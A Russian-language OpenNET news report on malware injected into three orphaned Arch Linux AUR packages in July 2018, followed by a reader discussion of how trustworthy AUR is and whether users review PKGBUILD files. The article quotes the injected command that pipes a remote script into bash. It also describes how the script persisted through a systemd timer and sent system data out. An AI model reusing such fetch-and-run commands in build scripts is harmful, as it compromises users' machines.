The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

11.07.2018 08:59  В AUR-репозитории Arch Linux найдено вредоносное ПО

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

  1. Главная ссылка к новости (https://sensorstechforum.com/a...)
  2. OpenNews: Из каталога Docker Hub удалено 17 образов контейнеров с вредоносным кодом
  3. OpenNews: Компания Canonical опубликовала заявление, связанное с вредоносным ПО в Snap Store
  4. OpenNews: В четырёх популярных дополнениях к Chrome выявлен вредоносный код
  5. OpenNews: В каталоге Python-пакетов PyPI выявлено 10 вредоносных библиотек
  6. OpenNews: Атака на Kodi, VLC и Popcorn-Time через вредоносные субтитры
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: aur, archlinux
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Аноним (1), 10:22, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]
  • –13 +/
    >учётная запись разработчика xeactor заблокирована

    Как-то нетолерантно.

     
     
  • 2.127, Fantomas (??), 17:21, 12/07/2018 [^] [ответить]    [к модератору]
  • +1 +/
    Уууууу, толераст
     
  • 1.2, Michael Shigorin (ok), 10:24, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]
  • –12 +/
    По сути от'whitehat'ил...
     
     
  • 2.6, Atterratio (ok), 10:45, 11/07/2018 [^] [ответить]    [к модератору]
  • +26 +/
    А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
     
     
  • 3.20, Michael Shigorin (ok), 11:32, 11/07/2018 [^] [ответить]    [к модератору]
  • –17 +/
    Это было удивление тем, что заблокировали вместо того, чтоб сказать спасибо за науку.
     
     
  • 4.28, Аноним (28), 12:22, 11/07/2018 [^] [ответить]    [к модератору]  
  • +12 +/
    За какую науку? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
     
     
  • 5.103, Джон Ленин (?), 00:13, 12/07/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    AUR полностью аналогичен PPA, и цели для которых он предназначен конвертация чуж... весь текст скрыт [показать]
     
  • 3.23, Аноним (23), 11:49, 11/07/2018 [^] [ответить]    [к модератору]  
  • +8 +/
    > А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.

    "Я не я, и лошадь не моя!" - это в таких вот новостях.
    А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУР:
    https://repology.org/statistics/total
    ;)


     
     
  • 4.56, Аноним (56), 15:49, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    в связи с этим случаем я даже видел заявление, что AUR (Arch User Repository) никакого отношения к арчу не имеет
     
     
  • 5.79, soarin (ok), 19:40, 11/07/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    Фанатики, сэр.
     
  • 4.104, Аноним (104), 00:14, 12/07/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    Объясняю для танкистов Момент первый В АУРе примерно 25-40 поддерживаемых сбо... весь текст скрыт [показать]
     
     
  • 5.111, Аноним (23), 03:12, 12/07/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    checkinstall Не, не слышали Отсюда и полная неуместность сравнения с нормальны... весь текст скрыт [показать]
     
  • 4.105, Джон Ленин (?), 00:19, 12/07/2018 [^] [ответить]     [к модератору]  
  • +/
    То, что скрипт сборки умеет лазить в репозитории дебианов и федор, тягать оттуда... весь текст скрыт [показать]
     
  • 4.112, лютый охохоня... (?), 05:03, 12/07/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Вапщта в Арче пакетов много даже БЕЗ aur Плюс, в целом ситуация - когда обнаруж... весь текст скрыт [показать]
     
     
  • 5.120, Аноним (23), 12:10, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    >>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то
    > Вапщта в Арче пакетов много даже БЕЗ aur.

    Вапщта нет. И количество пакетов != количество софта.


     
     
  • 6.132, Аноним (132), 14:55, 13/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Ага. Да и количество пакетов - не самый важный показатель.
     
  • 2.57, Аноним (56), 15:54, 11/07/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    от'redhat'ил
     
     
  • 3.102, Аноним (102), 22:34, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Аргументируй
     
  • 2.77, crypt (ok), 18:57, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > По сути от'whitehat'ил...

    да, но скорее тестировали, как пройдет.


     
  • 1.3, Аноним (3), 10:35, 11/07/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Отсюда вывод никаких бинарных пакетов от людей не являющихся официальными разра... весь текст скрыт [показать]
     
     
  • 2.4, Atterratio (ok), 10:42, 11/07/2018 [^] [ответить]    [к модератору]  
  • +10 +/
    Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.
     
     
  • 3.11, Celcion (ok), 10:52, 11/07/2018 [^] [ответить]     [к модератору]  
  • –8 +/
    И этот кто-то - ты Серьезно А -bin пакеты - это что https aur archlinux o... весь текст скрыт [показать]
     
     
  • 4.13, Аноним (13), 11:01, 11/07/2018 [^] [ответить]    [к модератору]  
  • +4 +/
    > Серьезно? А "-bin" пакеты - это что?

    А где лежат сами пакеты без подсказки догадаетесь?

     
     
  • 5.15, Celcion (ok), 11:02, 11/07/2018 [^] [ответить]     [к модератору]  
  • –8 +/
    Можно раскрыть мысль - а как это отменяет факт, что бинарные пакеты в AUR таки е... весь текст скрыт [показать]
     
     
  • 6.36, Аноним (36), 13:17, 11/07/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.
     
     
  • 7.70, Celcion (ok), 17:35, 11/07/2018 [^] [ответить]     [к модератору]  
  • –5 +/
    Действительно, такие как ты очень любят настойчиво не понимать, с чем идет спор ... весь текст скрыт [показать]
     
     
  • 8.107, Александр (??), 01:06, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Спор какой-то не в тему. Впадлу что ли PKGBILD глянуть на предмет, от куда бинари дёргаются.
     
     
  • 9.118, Celcion (ok), 09:36, 12/07/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    А впaдлу включить голову и попытаться понять, что речь идет не об этом Или ту... весь текст скрыт [показать]
     
     
  • 10.137, чебурнет.рф (ok), 05:27, 15/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.
     
     
  • 11.139, Celcion (ok), 10:16, 16/07/2018 [^] [ответить]     [к модератору]  
  • +/
    Остаться правым можно в случае, если был какой-то спор А когда ты говоришь про ... весь текст скрыт [показать]
     
  • 7.92, Аноним (92), 20:37, 11/07/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    Так это ещё хуже, чем если бы они там были. Тупо в любой момент можно бинарник подменить.
     
  • 5.44, анонимус (??), 14:14, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Серьезно что ли?
    Откройте PKGBUILD, не поленитесь. Там в строчке source указано, где лежит бинарь
     
     
  • 6.133, Джон Ленин (?), 01:27, 14/07/2018 [^] [ответить]     [к модератору]  
  • +/
    и к нему контрольная сумма прилагается Так например проприетарный торрент-кл... весь текст скрыт [показать]
     
     
  • 7.140, Celcion (ok), 10:24, 16/07/2018 [^] [ответить]     [к модератору]  
  • +/
    Верно Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом са... весь текст скрыт [показать]
     
  • 4.16, Амнон (?), 11:05, 11/07/2018 [^] [ответить]    [к модератору]  
  • +9 +/
    > Серьезно? А "-bin" пакеты - это что?

    Тебе ещё раз повторяют: в самом AUR'е не содержится никаких пакетов, тем более бинарных. AUR - это сборник PKGBUILD'ов, скриптов сборки пакетов. Но в AUR'е присутствуют скрипты для установки бинарников, это да.

     
     
  • 5.30, виндотролль (ok), 12:25, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    В аур, думаю, можно коммитнуть бинарник (головой не ручаюсь, может быть у них там какие-то хуки стоят на пуш, а пробовать не приходилось) и добавить его в sources
     
     
  • 6.53, Арчевод (?), 15:32, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Нельзя
     
     
  • 7.55, виндотролль (ok), 15:47, 11/07/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    Почему?
    Точно можно всякие .desktop коммитить. И кажется, где-то даже видел .xpm в сорцах, что есть бинарник.
     
     
  • 8.93, Dmitry Shachnev (ok), 20:37, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    И .desktop, и .xpm — это текстовые форматы.
     
     
  • 9.106, виндотролль (ok), 00:50, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Так а все таки, что помешает? Запушить не позволят?

    Не хочу заняться аур тестовым пакетом чтоб только проверить

     
  • 5.72, Celcion (ok), 17:36, 11/07/2018 [^] [ответить]     [к модератору]  
  • –3 +/
    Именно про это и говорилось, и ничего не говорилось про то, где бинарные пакеты ... весь текст скрыт [показать]
     
  • 4.87, axredneck (?), 20:17, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Ну да, они есть. Но достаточно скачать такой PKGBUILD и глянуть в нем, откуда качается бинарь, чтобы понять, стоит это ставить или нет.
     
  • 3.33, Vitaliy Blats (?), 12:29, 11/07/2018 [^] [ответить]     [к модератору]  
  • –6 +/
    Наркоманштoле Каким образом ты думаешь устанавливается софт по типу вайбера ... весь текст скрыт [показать]
     
     
  • 4.39, админ локалхоста (?), 14:01, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    вот только в AUR-е от этого бинарников не появилось
     
     
  • 5.54, Vitaliy Blats (?), 15:34, 11/07/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    > вот только в AUR-е от этого бинарников не появилось

    Это каким-то образом отменяет установку бинарника ?

     
     
  • 6.108, Александр (??), 01:19, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    С каких пор установка бинарей с оф. сайтов стала трагедией?
     
  • 2.5, rand (?), 10:45, 11/07/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Этот вывод не отсюда. В данном случае хватило бы просто прочесть скрипт сборки.
     
  • 2.8, виндотролль (ok), 10:45, 11/07/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    AUR это и делает Выкачать PKGBUILD из AUR и проверить 20-строчный скрипт на пре... весь текст скрыт [показать]
     
     
  • 3.27, Аноним (27), 12:19, 11/07/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    О да, для каждого пакета просматривать скрипт установки то еще удовольствие.
     
     
  • 4.35, Shatur (ok), 12:59, 11/07/2018 [^] [ответить]    [к модератору]  
  • +5 +/
    Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый скрипт сборки.
     
     
  • 5.59, J.L. (?), 16:15, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый
    > скрипт сборки.

    кстати а при обновлении из AURа пакетный манагер обновляет или говорит что низя и надо смотреть?

     
     
  • 6.62, Аноним (62), 16:41, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Смотря какой манагер. yaourt обновляет, но отдельно от бинарных реп, и предлагает каждый pkgbuild посмотреть.
     
     
  • 7.86, axredneck (?), 20:13, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Более того, он может обновлять через git и предлагать проверить не весь PKGBUILD, а только изменения в нем.
     
  • 7.100, ы (?), 21:26, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    на всякий случай про текущую ситуацию с yaourt: https://www.reddit.com/r/archlinux/comments/8wp9ep/psa_that_shouldnt_be_needed
     
     
  • 8.129, UzerBluzer (?), 21:04, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Сейчас в моде aurman. Держу в курсе.
     
  • 6.64, анан (?), 16:43, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    при каждой установке  или обновлении пакета предлагает посмотреть
     
     
  • 7.75, J.L. (?), 18:21, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > при каждой установке  или обновлении пакета предлагает посмотреть

    а много можно понять по такому билдскрипту?
    https://www.opennet.ru/openforum/vsluhforumID3/114809.html#48

     
     
  • 8.109, Александр (??), 01:23, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Увы, но что-то я там не увидел билдскрипта.
     
     
  • 9.122, J.L. (?), 12:50, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > Увы, но что-то я там не увидел билдскрипта.

    а что же там? "Kусок из PKGBUILD chromium-dev"

     
     ....нить скрыта, показать (39)

  • 1.7, odity (ok), 10:45, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    В скрипте не видно,что он создает в usr/lib/systemd/system что-то
     
     
  • 2.10, SysA (?), 10:50, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Как это?!..
     
  • 2.126, Аноним (126), 17:20, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    /usr/lib/systemd/systemd.so ? :-)
     
  • 1.9, Аноним (-), 10:47, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    ну, учитывая что в аур даже варез заливают, заголовок желтоват. "Доверяй, но проверяй"
     
  • 1.12, виндотролль (ok), 10:53, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    мне видится 1 потенциально удачный сценарий атаки на AUR — сделать вредоносный патч на сишечке, а лучше перле к какому-нибудь сложному софту (чтоб нелегко было разобраться) с аргументацией, что патч что-то улучшает (Arch позволяет делать патчи частью пакета). Лучше если будет много патчей, да чтоб часть из них правда делала что-то полезное, а без некоторых сборка на арче была невозможна.

    Тогда — высока вероятность, что вредоносный патч заметят очень не сразу.

     
     
  • 2.17, emaName (?), 11:09, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    И что это за мегапопулярный пакет будет, что кто-то будет этим заморачиваться?
     
     
  • 3.22, Аноним (22), 11:44, 11/07/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Навскидку - гуглохром подойдёт. Особенно пикантно, если патчи будут чистить гуглозонды. Параноики же должны страдать, правда?
     
     
  • 4.24, emaName (?), 11:49, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Вряд ли к таким пакетам проходимец какой-нибудь дорвется.
     
     
  • 5.32, nrv (ok), 12:26, 11/07/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    К основному Хрому да А к какой-нибудь патченной в ауре, которая типа буз гуглоз... весь текст скрыт [показать]
     
  • 4.25, emaName (?), 11:51, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.
     
     
  • 5.48, Аноним84701 (ok), 14:43, 11/07/2018 [^] [ответить]     [к модератору]  
  • +3 +/
    Вопрос в том, мониторят ли так же и все сторонние патчи Kусок из PKGBUILD chrom... весь текст скрыт [показать]
     
     
  • 6.65, анан (?), 16:46, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    там у каждого файла по рекомендациям должна быть хеш, если изменить файлы то хеш не сойдется, но в принципе я думаю никто не следит за тем что хеши обновляются
     
     
  • 7.76, виндотролль (ok), 18:33, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    блин, это ж естественно, что хеши обновляются Код меняется, патчи адаптируются ... весь текст скрыт [показать]
     
     
  • 8.80, пох (?), 19:42, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    а смыл-то в чем Вот подпишу я тебе своим ключом пакет, создающий у тебя в хомяк... весь текст скрыт [показать]
     
  • 4.88, axredneck (?), 20:19, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    В смысле, Хромиум? А то к Хрому сишные патчи не применишь.
     
  • 1.18, Gentoo Developer (?), 11:24, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Только Gentoo!
     
     
  • 2.73, Васёк (?), 17:54, 11/07/2018 [^] [ответить]    [к модератору]  
  • +5 +/
    Иногда нужно работать а не компилировать
     
     
  • 3.89, axredneck (?), 20:25, 11/07/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Можно make -j1 в фоне в /tmp. Если в /tmp места нет, то BFQ. Но опять же приходится доверять тому, что в оверлеях.
     
  • 3.138, FSA (??), 13:22, 15/07/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Вот реально в фоне бывает крутится сборка какого-то крупного обновления Из неуд... весь текст скрыт [показать]
     
  • 1.19, Чебур (?), 11:30, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +17 +/
    На свалке нашли мусор, вот так новость.
     
     
  • 2.21, iPony (?), 11:38, 11/07/2018 [^] [ответить]    [к модератору]  
  • +8 +/
    Новость наверно в том, что раньше не находили.
    Это немного удивительно.
     
     
  • 3.29, рачевод (?), 12:25, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    удивительно, что никто не хотел рыться в свалке, чтобы убедиться - Ну вот, н... весь текст скрыт [показать]
     
  • 3.49, Андрей (??), 14:53, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Так, может, там такого добра ещё много. Но только один чел взял и намеренно создал файлик ваш.archlinux.скомпрометирован.txt, так что не заметить было просто нельзя.
     
  • 2.42, anonimm (?), 14:08, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Эта новость, наверное, больше удивила тех, кто с миром Arch не знаком (в частности, меня): оказывается, у них там принято копаться по помойкам!
     
  • 1.34, Аноним (34), 12:39, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Почалось! Я давно уже ждал когда начнется распространение заразы со всяких ppa помоек, по которым любят шарится фанаты пакетных дистров. Давно пора.
     
     
  • 2.50, Андрей (??), 14:55, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    А типа в ядро или другой проект не может попасть вредоносный код Мэйнтейнеры то... весь текст скрыт [показать]
     
     
  • 3.115, Аноним (115), 08:40, 12/07/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    Достаточно не новичку захотеть реальных денег за свои труды Что такое доверие, ... весь текст скрыт [показать]
     
  • 2.94, Аноним (94), 20:46, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    https://www.opennet.ru/opennews/art.shtml?num=24610 - я просто оставлю это здесь.
     
  • 1.38, commiethebeastie (ok), 13:45, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    Так AUR помойка, зато в ней есть практически всё.
     
     
  • 2.40, Аноним (-), 14:06, 11/07/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Мое любимое место, столько хaлявной тухлятинки, мммм... обожаю. ;)
     
     
  • 3.41, commiethebeastie (ok), 14:07, 11/07/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Тухлятинка обычно не собирается.
     
     
  • 4.134, Джон Ленин (?), 01:33, 14/07/2018 [^] [ответить]     [к модератору]  
  • +/
    Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальну... весь текст скрыт [показать]
     
  • 1.46, Совсем другой Аноним (?), 14:18, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Забавные они там все.
    Вот просто так валяется хлам и каждый может ещё сверху нагадить.
    Не у всех видимо есть ресурсы на создание чего-то по типу Suse build service.
     
     
  • 2.47, нах (?), 14:25, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    так вроде сузя его уже тоже - тогось, остался урезанный и с фейс-контролем на вх... весь текст скрыт [показать]
     
     
  • 3.52, sergey (??), 15:17, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Вроде, нет. Любой желающий может собирать пакеты, как и раньше.
     
  • 1.51, J.L. (?), 14:55, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    аааааяяя говорииииииил!!!!

    линукс надо защищать по дефолту и юзера от программ и программы от программ
    в винде в силу контингента иди^W пользователей оной с этим сейчас лучше чем в линуксе

     
     
  • 2.58, Аноним (58), 16:03, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    В виндоувсе со многими аспектами лучше, чем в линуксе.
     
     
  • 3.63, Клыкастый (ok), 16:41, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    с троянами и майнингом например
     
     
  • 4.69, нах (?), 17:34, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    в windows store - пока не замечено ни того, ни другого.

    В том числе да, и потому, что надо заплатить денег за сертификат. Пусть копеечных.

     
     
  • 5.74, Клыкастый (ok), 17:55, 11/07/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    > в windows store - пока не замечено ни того, ни другого.

    так там и софта не замечено

     
     
  • 6.78, пох (?), 19:37, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    патамуштанадазаплатитьзасертификат, ага Ну то есть - помоечного софта незамечен... весь текст скрыт [показать]
     
     
  • 7.81, username (??), 19:47, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    В маке как то решают, все живы. Там сертификат подписи с оперативным отзывом со стороны apple и ревью приложения перед публикацией.
     
     
  • 8.84, soarin (ok), 19:59, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > В маке как то решают, все живы

    Не все. Многие от туда просто свалили. И распространяют свой софт не через AppStore, а по принципу "скачать dmg с нашего сайта"


     
     
  • 9.96, username (??), 21:03, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    Свалили таки по другой причине Любой софт из стора работает в песочнице по моем... весь текст скрыт [показать]
     
  • 8.116, . (?), 09:31, 12/07/2018 [^] [ответить]     [к модератору]  
  • +/
    идея та же что у MS, но уже не годится первый попавшийся code signing сертификат... весь текст скрыт [показать]
     
  • 7.83, soarin (ok), 19:57, 11/07/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Плохо смотрел Этак в годах 2013-2014 я как-то туда лазил Там жуть была Потом ... весь текст скрыт [показать]
     
  • 3.98, Аноним84701 (ok), 21:19, 11/07/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    В смысле -- вместо долгих 171 нескольких часов 187 , всего за какой-то жалкий... весь текст скрыт [показать]
     
     
  • 4.128, нах (?), 17:27, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    вот и не ставь всякой фигни с васян-сайтов, и под виндой тоже не.
    Хакнули-то cdn avast, а не microsoft store.

     
  • 1.61, Аноним (62), 16:36, 11/07/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –1 +/
    Внезапно, в AUR е и гентушных оверлеях можно хоть скрипт сборочный почитать, что... весь текст скрыт [показать]
     
     
  • 2.67, нах (?), 17:33, 11/07/2018 [^] [ответить]     [к модератору]  
  • +/
    ты не поверишь, в большинстве этих помоек есть source repo Но из него никто ник... весь текст скрыт [показать]
     
     
  • 3.90, axredneck (?), 20:30, 11/07/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    > рачеводы никогда не читают свои сборочные скрипты

    Я читаю

     
  • 3.114, Аноним (62), 08:34, 12/07/2018 [^] [ответить]     [к модератору]  
  • +/
    В больших, типа epel я есть, а в мелких, на пять-десять пакетов пару раз только ... весь текст скрыт [показать]
     
  • 3.117, Daemon (??), 09:31, 12/07/2018 [^] [ответить]     [к модератору]  
  • –2 +/
    а при чем тут source repo пакет как минимум deb, за rpm не ручаюсь - это архи... весь текст скрыт [показать]
     
     
  • 4.131, Аноним (131), 13:32, 13/07/2018 [^] [ответить]    [к модератору]  
  • +/
    На сколько пакетов тебя хватит?
     
  • 2.68, anonymous (??), 17:34, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Ну почитал и что. То же что и на бинарник поглядеть. Читатели блин.
     
  • 1.85, lucentcode (ok), 20:06, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Эка невидаль. А PKGBUILD на что yaourt каждый раз заботливо предлагает читать? Большинство из них очень простенькие. Есть пакеты с патчсетами, где диффы прямо с пакетом идут, но их мало и патчи как правило тоже маленькие. Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD, ну и изучать остальные задействованные при сборке файлы, если они вызывают пусть и слабые, но подозрения. Зная как работает AUR, нужно просто им правильно пользоваться. А от бяки никто не застрахован. Вот недавно в snap-пакетах майнеры находили. Не удивлюсь, если и в пакетах какого-то не очень популярного дистра(или хотя-бы в ppa популярного) найдут подобные "подарки". А пацику, что отвайтхейтил неосторожных пользователей AUR спасибо сказать нужно - он ничем деструктивным не побаловался на их тачках, и при этом преподал им ценный урок. Будут читать PKGBUILD-ы теперь.
     
     
  • 2.95, axredneck (?), 20:51, 11/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > А PKGBUILD на что yaourt каждый раз заботливо предлагает читать

    Есть, правда, еще pacaur, который, если не ошибаюсь, молча качает и ставит.

     
  • 2.123, J.L. (?), 12:57, 12/07/2018 [^] [ответить]     [к модератору]  
  • +/
    а не важные для вас пакеты значит хомяк не овнят с остальным согласен просто не... весь текст скрыт [показать]
     
     
  • 3.142, lucentcode (ok), 23:49, 29/07/2018 [^] [ответить]    [к модератору]  
  • +/
    > просто не метод всё глазами и руками делать, так можно дойти до
    > самостоятельного написания нужных лично программ
    > тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных
    > данных вместо реальных и тд

    Согласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.

     
  • 1.99, Sluggard (ok), 21:22, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    Как-то не удивляет и не пугает такое. AUR в Арче, юзерские PPA в Убунту, репы home:user в Сусе — это всегда неизвестно что и на свой страх и риск.
     
  • 1.101, ы (?), 21:29, 11/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    большинство пипла, судя по комментам, не в курсе с чем едят aur, а с чем нет, но, чсх, мнение имеют.
     
  • 1.110, Аноним (110), 01:48, 12/07/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Типичный линуксоидно-школотронский стиль - засунем в билды всяких примочек, скри... весь текст скрыт [показать]
     
     
  • 2.113, Аноним (62), 08:27, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Внизaпна, унутре твоих любимых .exe тоже есть скрипты, но тебе их не покажут, чтоб не травмировать нежную хипсторскую психику.
     
  • 2.141, arisu (ok), 20:03, 16/07/2018 [^] [ответить]    [к модератору]  
  • +/
    вот тебе, например, рабочих мозгов надо.
     
  • 1.119, Аноним (119), 10:59, 12/07/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –1 +/
    Та норм тема аур Все кто его хейтят просто завидуют, что в их дистре нет подоб... весь текст скрыт [показать]
     
     
  • 2.121, Аноним (23), 12:30, 12/07/2018 [^] [ответить]     [к модератору]  
  • +/
    Перевод с арчеводного на русский хейтить - не любить, не восторгаться, непочт... весь текст скрыт [показать]
     
  • 2.136, Аноним (136), 20:52, 14/07/2018 [^] [ответить]    [к модератору]  
  • +/
    Все завидуют,ага.
    Особенно bsdишники и гентушники ХD
     
  • 1.124, Аноним (124), 14:13, 12/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    > В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com

    Проделки космонафта. Хочет сравнить с результаты с бубунтой.

     
     
  • 2.125, нах (?), 16:46, 12/07/2018 [^] [ответить]    [к модератору]  
  • +/
